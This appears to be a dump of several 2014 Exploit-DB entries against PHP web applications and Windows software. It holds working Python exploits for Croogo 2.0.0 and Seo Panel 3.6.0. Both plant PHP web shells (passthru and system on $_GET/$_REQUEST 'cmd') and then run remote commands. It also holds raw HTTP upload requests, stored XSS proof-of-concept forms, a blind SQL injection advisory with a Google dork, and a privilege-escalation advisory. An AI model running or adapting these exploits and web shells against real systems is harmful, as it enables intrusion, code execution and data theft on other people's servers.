| Croogo 2.0.0 Arbitrary PHP Code Execution Exploit |
| |
| |
| ID: ZSL-2014-5202 |
| |
| Copyleft (c) 2014, Zero Science Lab |
| |
@---------------------------------------------------------------@
'''
if len(sys.argv) < 3:
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk croogo\n'
sys.exit()
bannerche()
print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
host = sys.argv[1]
path = sys.argv[2]
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
try:
getcsrf = opener.open('http://'+host+'/'+path+'/admin/users/users/login')
csrf = getcsrf.read()
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
print
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
print
sys.exit()
print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
token_key = re.search(r'\[key\]\" value=\"(.+?)\"', csrf).group(1)
print '\x20\x20[*] Retrieving login CSRF token '+'.'*27+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Login CSRF token: '+Fore.YELLOW+token_key+Fore.RESET
print '\x20\x20[*] Login please.'
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')
login_data = urllib.urlencode({
'_method' : 'POST',
'data[User][password]' : password,
'data[User][remember]' : '0',
'data[User][username]' : username,
'data[_Token][fields]' : '93365ba06ce101995d3cd9c79cce968b12fb6ee5:',
'data[_Token][key]' : token_key,
'data[_Token][unlocked]' : ''
})
login = opener.open('http://'+host+'/'+path+'/admin/users/users/login', login_data)
auth = login.read()
for session in cj:
sessid = session.name
print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
if re.search(r'Incorrect username or password', auth):
print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET
print
sys.exit()
else:
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
getcsrfattach = opener.open('http://'+host+'/'+path+'/admin/file_manager/attachments/add')
csrfattach = getcsrfattach.read()
token_key2 = re.search(r'\[key\]\" value=\"(.+?)\"', csrfattach).group(1)
print '\x20\x20[*] Retrieving upload CSRF token '+'.'*26+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Upload CSRF token: '+Fore.YELLOW+token_key2+Fore.RESET
class MultiPartForm(object):
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
self.form_fields.append((name, value))
return
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return
def __str__(self):
parts = []
part_boundary = '--' + self.boundary
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
if __name__ == '__main__':
form = MultiPartForm()
form.add_field('_method', 'POST')
form.add_field('data[_Token][key]', token_key2)
form.add_field('data[_Token][fields]', 'c0c3f5d102d9672429f5c571a5f45c34255a93a9%3A')
form.add_field('data[_Token][unlocked]', '')
form.add_file('data[Attachment][file]', 'zsl.php',
fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>'))
request = urllib2.Request('http://'+host+'/'+path+'/admin/file_manager/attachments/add')
request.add_header('User-agent', 'joxypoxy 5.0')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)
furl = '/uploads/zsl.php'
#furl = '/webroot/uploads/zsl.php'
print
today = datetime.date.today()
fname = 'croogo-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
logging.basicConfig(filename=fname,level=logging.DEBUG)
logging.info(' '+'+'*75)
logging.info(' +')
logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
logging.info(' + Title: Croogo 2.0.0 Arbitrary PHP Code Execution Exploit')
logging.info(' + Python program executed: '+sys.argv[0])
logging.info(' + Version: '+version)
logging.info(' + Full query: \''+piton+'\x20'+host+'\'')
logging.info(' + Username input: '+username)
logging.info(' + Password input: '+password)
logging.info(' + Vector: '+'http://'+host+'/'+path+furl)
logging.info(' +')
logging.info(' + Advisory ID: ZSL-2014-5202')
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
logging.info(' +')
logging.info(' '+'+'*75+'\n')
print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
raw_input()
while True:
try:
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd))
reverse = execute.read()
pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
print Style.BRIGHT+Fore.CYAN
cmdout = pattern.match(reverse)
print cmdout.groups()[0].strip()
print Style.RESET_ALL+Fore.RESET
if cmd.strip() == 'exit':
break
logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
except Exception:
break
logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
print
sys.exit()
#
## OTHER ##
#
#
# Arbitrary file creation any location:
#
# - http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A\xampp\htdocs\croogo\
#
#
# Arbitrary file upload any location:
# - http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5C
#
#
###########
#
# POST /croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
# Connection: keep-alive
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 229
#
# _method=POST&data%5B_Token%5D%5Bkey%5D=4f20867747cbff33951db804266494804e96bf89&data%5BFileManager%5D%5Bname%5D=shell2.php&data%5B_Token%5D%5Bfields%5D=4aeda1af05803a2ae8503d6033160c17d6335641%253A&data%5B_Token%5D%5Bunlocked%5D=
#
###########
#
# POST /croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://localhost/croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
# Connection: keep-alive
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 304
#
# _method=POST&data%5B_Token%5D%5Bkey%5D=5a6516e263eb6e5504e2266783b42cd08e3efe16&data%5BFileManager%5D%5Bcontent%5D=test%0D%0A%3C%3Fphp%0D%0Apassthru%28%24_GET%5B%27cmd%27%5D%29%3B%0D%0A%3F%3E%0D%0A&data%5B_Token%5D%5Bfields%5D=8f1bb3e7acda642ca69ee0430abba1f5ecd5f7a7%253A&data%5B_Token%5D%5Bunlocked%5D=
#
###########
#
# POST /croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
# Connection: keep-alive
# Content-Type: multipart/form-data; boundary=---------------------------25555888422431
# Content-Length: 779
#
# -----------------------------25555888422431
# Content-Disposition: form-data; name="_method"
#
# POST
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[_Token][key]"
#
# 0d940d3b3f4c80ea98b3e5588c337587f7c50d5e
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[FileManager][file]"; filename="exploit.php"
# Content-Type: application/octet-stream
#
# test
# <?php
# passthru($_GET['cmd']);
# ?>
#
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[_Token][fields]"
#
# 6f3f788048d33beefcc340fe281cf758e20ad329%3A
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[_Token][unlocked]"
#
#
# -----------------------------25555888422431--
#
#

210
platforms/php/webapps/34959.txt Executable file
View file

@ -0,0 +1,210 @@
?<<<
Croogo 2.0.0 Multiple Stored XSS Vulnerabilities
Vendor: Fahad Ibnay Heylaal
Product web page: http://www.croogo.org
Affected version: 2.0.0
Summary: Croogo is a free, open source, content management system
for PHP, released under The MIT License. It is powered by CakePHP
MVC framework.
Desc: Croogo version 2.0.0 suffers from multiple stored cross-site
scripting vulnerabilities. Input passed to several POST parameters
is not properly sanitised before being returned to the user. This
can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Zero Science Lab - http://www.zeroscience.mk
Macedonian Information Security Research And Development Laboratory
Advisory ID: ZSL-2014-5201
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5201.php
Vendor: http://blog.croogo.org/blog/croogo-210-released
26.07.2014
>>>
------------------------
(XSS #1)
--------
POST parameters:
- data[Contact][title]
------------------------
<html>
<!-- PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/croogo/admin/contacts/contacts/add" method="POST">
<input type="hidden" name="_method" value="POST" />
<input type="hidden" name="data[_Token][key]" value="2627e9e204ad6b878dbaf1c08d830c3e744d7e6e" />
<input type="hidden" name="data[Contact][id]" value="" />
<input type="hidden" name="data[Contact][title]" value=""><script>alert("XSS");</script>" />
<input type="hidden" name="data[Contact][alias]" value="test" />
<input type="hidden" name="data[Contact][email]" value="a@a.com" />
<input type="hidden" name="data[Contact][body]" value="" />
<input type="hidden" name="data[Contact][name]" value="" />
<input type="hidden" name="data[Contact][position]" value="" />
<input type="hidden" name="data[Contact][address]" value="" />
<input type="hidden" name="data[Contact][address2]" value="" />
<input type="hidden" name="data[Contact][state]" value="" />
<input type="hidden" name="data[Contact][country]" value="" />
<input type="hidden" name="data[Contact][postcode]" value="" />
<input type="hidden" name="data[Contact][phone]" value="" />
<input type="hidden" name="data[Contact][fax]" value="" />
<input type="hidden" name="data[Contact][message_status]" value="0" />
<input type="hidden" name="data[Contact][message_archive]" value="0" />
<input type="hidden" name="data[Contact][message_notify]" value="0" />
<input type="hidden" name="data[Contact][message_spam_protection]" value="0" />
<input type="hidden" name="data[Contact][message_captcha]" value="0" />
<input type="hidden" name="data[Contact][status]" value="0" />
<input type="hidden" name="data[_Token][fields]" value="262e37f00fdd538ab98d168114e8befb72ba27ff%3AContact.id" />
<input type="hidden" name="data[_Token][unlocked]" value="apply" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
------------------------
(XSS #2)
--------
POST/PUT parameters:
- data[Block][title]
- data[Block][alias]
------------------------
<html>
<!-- PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/croogo/admin/blocks/blocks/edit/10" method="POST">
<input type="hidden" name="_method" value="PUT" />
<input type="hidden" name="data[_Token][key]" value="bb5e47ab63281908e9783d9a20f66b7f56c573f3" />
<input type="hidden" name="data[Block][id]" value="10" />
<input type="hidden" name="data[Block][title]" value=""><script>alert(2);</script>" />
<input type="hidden" name="data[Block][alias]" value=""><script>alert(3);</script>" />
<input type="hidden" name="data[Block][region_id]" value="3" />
<input type="hidden" name="data[Block][body]" value="1" />
<input type="hidden" name="data[Block][class]" value="1" />
<input type="hidden" name="data[Block][element]" value="1" />
<input type="hidden" name="data[Role][Role]" value="" />
<input type="hidden" name="data[Block][visibility_paths]" value="" />
<input type="hidden" name="data[Block][params]" value="1" />
<input type="hidden" name="data[Block][status]" value="1" />
<input type="hidden" name="data[Block][show_title]" value="0" />
<input type="hidden" name="data[Block][show_title]" value="1" />
<input type="hidden" name="data[Block][publish_start]" value="0000-00-00 00:00:00" />
<input type="hidden" name="data[Block][publish_end]" value="0000-00-00 00:00:00" />
<input type="hidden" name="data[_Token][fields]" value="546f4a46648b8b32ea4c2b43a4a118ea7087e21b%3ABlock.id" />
<input type="hidden" name="data[_Token][unlocked]" value="apply" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
------------------------
(XSS #3)
--------
POST parameters:
- data[Region][title]
------------------------
<html>
<!-- PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/croogo/admin/blocks/regions/add" method="POST">
<input type="hidden" name="_method" value="POST" />
<input type="hidden" name="data[_Token][key]" value="a7d62c8c34e2a6414c3657c43790645dfdd63735" />
<input type="hidden" name="data[Region][id]" value="" />
<input type="hidden" name="data[Region][title]" value=""><script>alert(11);</script>" />
<input type="hidden" name="data[Region][alias]" value="1" />
<input type="hidden" name="data[_Token][fields]" value="4020bcbfbf5ba648b159ec8a4e166f53c1b58aa4%3ARegion.id" />
<input type="hidden" name="data[_Token][unlocked]" value="apply" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
------------------------
(XSS #4)
--------
POST parameters:
- data[Menu][title]
- data[Menu][alias]
------------------------
<html>
<!-- PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/croogo/admin/menus/menus/add" method="POST">
<input type="hidden" name="_method" value="POST" />
<input type="hidden" name="data[_Token][key]" value="253c5c67942b2d126c886c9ac7a62ebf065cf42b" />
<input type="hidden" name="data[Menu][id]" value="" />
<input type="hidden" name="data[Menu][title]" value=""><script>alert(22);</script>" />
<input type="hidden" name="data[Menu][alias]" value=""><script>alert(33);</script>" />
<input type="hidden" name="data[Menu][description]" value="ZSL" />
<input type="hidden" name="data[Menu][params]" value="1" />
<input type="hidden" name="data[Menu][status]" value="1" />
<input type="hidden" name="data[Menu][publish_start]" value="1" />
<input type="hidden" name="data[Menu][publish_end]" value="1" />
<input type="hidden" name="data[_Token][fields]" value="58685dc7a49f7617cffaa3a00ec4245516c5f9d3%3AMenu.id" />
<input type="hidden" name="data[_Token][unlocked]" value="apply" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
------------------------
(XSS #5)
--------
POST parameters:
- data[Link][title]
------------------------
<html>
<!-- PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/croogo/admin/menus/links/add/menu:6" method="POST">
<input type="hidden" name="_method" value="POST" />
<input type="hidden" name="data[_Token][key]" value="736e7539497307010b8cb8e70c44ec8a9798d0fb" />
<input type="hidden" name="data[Link][id]" value="" />
<input type="hidden" name="data[Link][menu_id]" value="6" />
<input type="hidden" name="data[Link][parent_id]" value="" />
<input type="hidden" name="data[Link][title]" value=""><script>alert(1);</script>" />
<input type="hidden" name="data[Link][link]" value="1" />
<input type="hidden" name="data[Role][Role]" value="" />
<input type="hidden" name="data[Link][class]" value="scriptalert1script" />
<input type="hidden" name="data[Link][description]" value="" />
<input type="hidden" name="data[Link][rel]" value="" />
<input type="hidden" name="data[Link][target]" value="" />
<input type="hidden" name="data[Link][params]" value="" />
<input type="hidden" name="data[Link][status]" value="0" />
<input type="hidden" name="data[Link][publish_start]" value="" />
<input type="hidden" name="data[Link][publish_end]" value="" />
<input type="hidden" name="data[_Token][fields]" value="d662745abb348c763337f58c8c3c28bb1e8c014f%3ALink.id" />
<input type="hidden" name="data[_Token][unlocked]" value="apply" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

42
platforms/php/webapps/34968.txt Executable file
View file

@ -0,0 +1,42 @@
Vulnerability title: Blind SQL Injection Vulnerability in YourMembers plugin
CVE: N/A
Vendor: YourMembers plugin
Product: https://github.com/YourMembers/yourmembers/tree/master/ym_trunk
Affected version: Version 3, 29 June 2007 (https://github.com/YourMembers/yourmembers/blob/master/LICENSE)
Google dork: inurl:ym_download_id=
Fixed version: N/A
Reported by: Tien Tran Dinh - tien.d.tran@itas.vn
Details:
The Blind SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URL and parameter has been confirmed to suffer from blind SQL injection:
GET /?ym_download_id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wfvt_2871549622=5434f2560126f; wpfront-notification-bar-landingpage=1; bp-activity-oldestpage=1; __utma=9793911.1350365293.1412756050.1412756050.1412756050.1; __utmb=9793911.1.10.1412756050; __utmc=9793911; __utmz=9793911.1412756050.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); all_RyDwsSBXVzZXJzGOTe_u0CDA-clickdesk_referrer=http%3A//www.google.com.vn/url%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26ved%3D0CB0QFjAA%26url%3Dhttp%253A%252F%252Fsdj
Connection: keep-alive
Vulnerable file: ym_trunk/includes/ym-download_functions.include.php
Vulnerable code: (Line: 313 -> 329)
function ym_get_download($id=false) {
global $wpdb, $ym_dl_db;
$row = new stdClass();
$row->id = $row->title = $row->filename = $row->postDate = $row->members = $row->user = false;
if ($id) {
$sql = 'SELECT id, title, filename, postDate, members, user
FROM ' . $ym_dl_db . '
WHERE id = ' . $id;
$row = $wpdb->get_row($sql);
}
return $row;
}
Credits: Thanks to Pham Kien Cuong (cuong.k.pham@itas.vn), Dang Quoc Thai (thai.d.dang@itas.vn), Le Ngoc Phi (phi.n.le@itas.vn)

137
platforms/php/webapps/34970.py Executable file
View file

@ -0,0 +1,137 @@
# Exploit Title: Seo Control Panel 3.6.0 Authenticated Sql Injection
# Date: 10/10/2014
# Exploit Author: Tiago Carvalho tcarvalho@dognaedis.com or tiago.alexandre@gmail.com
# Vendor Homepage: www.seopanel.in
# Software Link: http://www.seopanel.in/spdownload/
# Version: Seo Panel Version 3.6.0
# Tested on: Kali Linux and MAC OS X Mavericks
# OSVDB ID: Requested
"""
This vulnerability affects Seo Control Panel -
Product: Seo Panel Version 3.6.0
Tested on PHP 5.4.4-14+deb7u14
Vendor url :http://www.seopanel.in/
Their are multiple vulnerabilitis in the project not all of them are
exploitable
The Flowing exploit is able to successfull bypass the implemented
protections based on set of regex with along with a blacklist
the protections are implemeted in the flowing file:
file : includes/sp-load.php
lines: 128 to 150
The protection can easly be bypassed with payload used by this exploit
The Vulnerable method exploited is located at:
file: seo-plugins.php
method: __getSeoPluginInfo
lines: 175 to 178
Due to incorrect use of database client api
$ python seopanel.py e 127.0.0.1 /seopanel/ spadmin spadmin
[*] Upload was successfull!
$ python seopanel.py c 127.0.0.1 /seopanel/ "ls -la"
total 12
drwxrwxrwx 2 root root 4096 Oct 9 18:06 .
drwxr-xr-x 14 root root 4096 Oct 9 11:31 ..
- -rw-rw-rw- 1 mysql mysql 42 Oct 9 18:06 buckle.php
"""
#!/usr/bin/env python
import sys
import urllib2
import urllib
import cookielib
"""
This vulnerability affects Seo Control Panel -
Product: Seo Panel Version 3.6.0
Tested on PHP 5.4.4-14+deb7u14
Vendor url :http://www.seopanel.in/
Their are multiple vulnerabilitis in the project not all of them are exploitable
The Flowing exploit is able to successfull bypass the implemented protections based on set of regex with along with a blacklist
the protections are implemeted in the flowing file:
file : includes/sp-load.php
lines: 128 to 150
The protection can easly be bypassed with payload used by this exploit
The Vulnerable method exploited is located at:
file: seo-plugins.php
method: __getSeoPluginInfo
lines: 175 to 178
Due to incorrect use of database client api
$ python seopanel.py e 127.0.0.1 /seopanel/ spadmin spadmin
[*] Upload was successfull!
$ python seopanel.py c 127.0.0.1 /seopanel/ "ls -la"
total 12
drwxrwxrwx 2 root root 4096 Oct 9 18:06 .
drwxr-xr-x 14 root root 4096 Oct 9 11:31 ..
-rw-rw-rw- 1 mysql mysql 42 Oct 9 18:06 buckle.php
"""
def exploit(host,path,username,password):
#POST Login content type
headers = {'Content-type': 'application/x-www-form-urlencoded'}
#payload creates a file in project_dir/tmp
payload = {'pid':'\' UNION/**/select/**/\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',"\<\?php system($_REQUEST[\'cmd\']);\?\>"/**/from/**/seoplugins/**/into/**/outfile/**/\'/var/www/seopanel/tmp/buckle.php'}
base_url = "http://"+host+path
#url
post_args = {'userName': username, 'password': password,'sec':'login','referer':base_url,'login':'Sign In >>'}
#login url
url_login = base_url+"/login.php"
#vulnerable url
url_plugins = base_url+"/seo-plugins.php"
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
request = urllib2.Request(url_login)
request.add_data(urllib.urlencode(post_args))
request.add_header('Content-type', 'application/x-www-form-urlencoded')
login_request = opener.open(request)
code = int(login_request.code)
if code == 200:
try:
##The server returns a http status 500 but even when the attack is successfull
opener.open(url_plugins,urllib.urlencode(payload))
except Exception, e:
if check(base_url) == True:
print "[*] Upload was successfull!"
#call uploaded backdore and execute requested command
def shell(url,command):
url_shell = url+'/tmp/buckle.php'
encoded_args = urllib.urlencode({'cmd':command})
return urllib2.urlopen(url_shell, encoded_args)
#call uploaded backdore execute requested command and print the result
def cmd(host,path,command):
url = "http://"+host+path
print shell(url,command).read()
#check uploaded backdore is in place
def check(url):
code = shell(url,"ls").code
if(code == 200):
return True
else:
return False
if len(sys.argv) == 6:
if str(sys.argv[1]) == "e":
exploit(str(sys.argv[2]),str(sys.argv[3]),str(sys.argv[4]),str(sys.argv[5]))
if len(sys.argv) == 5:
if str(sys.argv[1]) == "c":
cmd(str(sys.argv[2]),str(sys.argv[3]),str(sys.argv[4]))

7
platforms/php/webapps/34972.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/44694/info
The AutoArticles 3000 component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_a3000&task=showarticle&id=1 [Blind Sql]

9
platforms/php/webapps/34973.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44704/info
The FeedList Plugin for Wordpress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to FeedList 2.61.01 are vulnerable.
http://www.example.com/wordpress/wp-content/plugins/feedlist/handler_image.php?i=%3Cscript%3Ealert(0)%3C/script%3E

9
platforms/php/webapps/34974.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44707/info
WP Survey And Quiz Tool for Wordpress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WP Survey And Quiz Tool 1.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/wp-survey-and-quiz-tool/pages/admin/surveys/create.php?action=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

4
platforms/windows/local/34648.txt Executable file
View file

@ -0,0 +1,4 @@
Exploit: http://www.joxeankoret.com/download/comodo_sandbox_escape/sandbox_test1.tar.gz
Mirror: www.exploit-db.com/sploits/sandbox_test1.tar.gz
Video: http://www.joxeankoret.com/download/comodo_sandbox_escape/video/sandbox_escape1.htm

118
platforms/windows/local/34966.txt Executable file
View file

@ -0,0 +1,118 @@
?
Telefonica O2 Connection Manager 3.4 Local Privilege Escalation Vulnerability
Vendor: Telefonica S.A.
Product web page: http://www.telefonica.com | http://www.o2.co.uk
Affected version: 3.4.R1 (108)
Summary: O2 Connection Manager will help you to manage your internet
connections by getting you connected to the fastest available network.
Automatically connect you to the fastest available network including
your home broadband if you have a wireless router.
Desc: O2 Connection Manager suffers from an elevation of privileges
vulnerability which can be used by a simple user that can change the
executable files with a binary of choice. The vulnerability exist due
to the improper permissions, with the 'F' flag (Full) for 'Everyone'
group, making the entire directory 'O2 Connection Manager' and its
files and sub-dirs world-writable.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5199
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5199.php
22.09.2014
---
==========================================================================
Arguments Used:
Filename = "C:\Program Files (x86)\O2CM-CE\O2 Connection Manager"
**************************************************************************
Directory: C:\Program Files (x86)\O2CM-CE\O2 Connection Manager
Permissions:
Type Username Permissions Inheritance
Allowed \Everyone Full Control This Folder Only
Allowed \Everyone Special (Unknown) Files Only
Allowed BUILTIN\Administrators Special (DCBA654321) This Folder and Files
Allowed NT SERVICE\TrustedInsta Full Control This Folder Only
Allowed NT SERVICE\TrustedInsta Special (Unknown) Subfolders only
Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
Allowed NT AUTHORITY\SYSTEM Special (Unknown) Subfolders and Files
Allowed BUILTIN\Administrators Full Control This Folder Only
Allowed BUILTIN\Administrators Special (Unknown) Subfolders and Files
Allowed BUILTIN\Users Read and Execute This Folder Only
Allowed BUILTIN\Users Special (Unknown) Subfolders and Files
Allowed \CREATOR OWNER Special (Unknown) Subfolders and Files
No Auditing set
Owner: NT AUTHORITY\SYSTEM
**************************************************************************
Operation Complete
Elapsed Time: 0,234375 seconds.
==========================================================================
Arguments Used:
Filename = "C:\Program Files (x86)\O2CM-CE\O2 Connection Manager\tscui.exe"
**************************************************************************
File: C:\Program Files (x86)\O2CM-CE\O2 Connection Manager\tscui.exe
Permissions:
Type Username Permissions Inheritance
Allowed \Everyone Full Control This Folder Only
Allowed BUILTIN\Administrators Special (DCBA654321) This Folder Only
Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only
Allowed BUILTIN\Administrators Full Control This Folder Only
Allowed BUILTIN\Users Read and Execute This Folder Only
No Auditing set
Owner: NT AUTHORITY\SYSTEM
**************************************************************************
Operation Complete
Elapsed Time: 0,125 seconds.
==========================================================================
C:\Program Files (x86)\O2CM-CE\O2 Connection Manager>icacls *.exe |findstr "Everyone:(I)(F)"
Elevate.exe Everyone:(I)(F)
locSrch.exe Everyone:(I)(F)
md5sum.exe Everyone:(I)(F)
patch.exe Everyone:(I)(F)
ProfileImp.exe Everyone:(I)(F)
SupportAssistant.exe Everyone:(I)(F)
tscui.exe Everyone:(I)(F)
vcredist_x86.exe Everyone:(I)(F)
WifiProfileImportTool.exe Everyone:(I)(F)
XAU.exe Everyone:(I)(F)
